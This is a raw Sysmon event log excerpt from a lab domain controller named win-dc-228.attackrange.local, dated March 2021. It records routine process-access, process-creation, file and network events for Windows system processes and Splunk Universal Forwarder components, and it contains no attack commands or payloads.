13:50:17.621{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199704Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:17.621{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199703Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:17.621{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199702Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:17.621{5ABCFE62-842D-603E-0500-00000000AD01}416432C:\Windows\system32\csrss.exe{5ABCFE62-E599-6040-C14D-00000000AD01}2220C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002199701Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:17.621{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E599-6040-C14D-00000000AD01}2220C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002199700Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:17.621{5ABCFE62-E599-6040-C14D-00000000AD01}2220C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002199699Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:17.105{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F5DB040675079B48734AA392430DD4E,SHA256=C25EA9909C22D328FF87ADEC802C5449991C0C1F05EFE404028E22602DCCF6BA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002199727Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:18.965{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E59A-6040-C34D-00000000AD01}5824C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199726Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:18.965{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199725Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:18.965{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199724Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:18.965{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199723Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:18.965{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199722Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:18.965{5ABCFE62-842D-603E-0500-00000000AD01}416432C:\Windows\system32\csrss.exe{5ABCFE62-E59A-6040-C34D-00000000AD01}5824C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002199721Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:18.965{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E59A-6040-C34D-00000000AD01}5824C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002199720Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:18.965{5ABCFE62-E59A-6040-C34D-00000000AD01}5824C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000002199719Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:14.991{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55069-false10.0.1.12-8000- 10341000x80000000000000002199718Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:18.418{5ABCFE62-E59A-6040-C24D-00000000AD01}28446620C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199717Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:18.293{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E59A-6040-C24D-00000000AD01}2844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199716Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:18.293{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199715Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:18.293{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199714Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:18.293{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199713Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:18.293{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199712Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:18.293{5ABCFE62-842D-603E-0500-00000000AD01}416432C:\Windows\system32\csrss.exe{5ABCFE62-E59A-6040-C24D-00000000AD01}2844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002199711Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:18.293{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E59A-6040-C24D-00000000AD01}2844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002199710Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:18.293{5ABCFE62-E59A-6040-C24D-00000000AD01}2844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002199709Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:18.199{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0DF298CB3D0B3E42B9917C571FA9865A,SHA256=C41C59026E0C44EEAAD208412230F128A46A39665516422A4F1A6C8616DD97F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199708Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:18.121{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B55458CB1962334F720EC6E3165B4F64,SHA256=2AF853459E8EB83B1FDDBCCF28BDF912D916AA3A2F7710990639F2E64950A901,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002199739Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:19.683{5ABCFE62-E59B-6040-C44D-00000000AD01}66406884C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199738Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:19.558{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E59B-6040-C44D-00000000AD01}6640C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199737Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:19.558{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199736Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 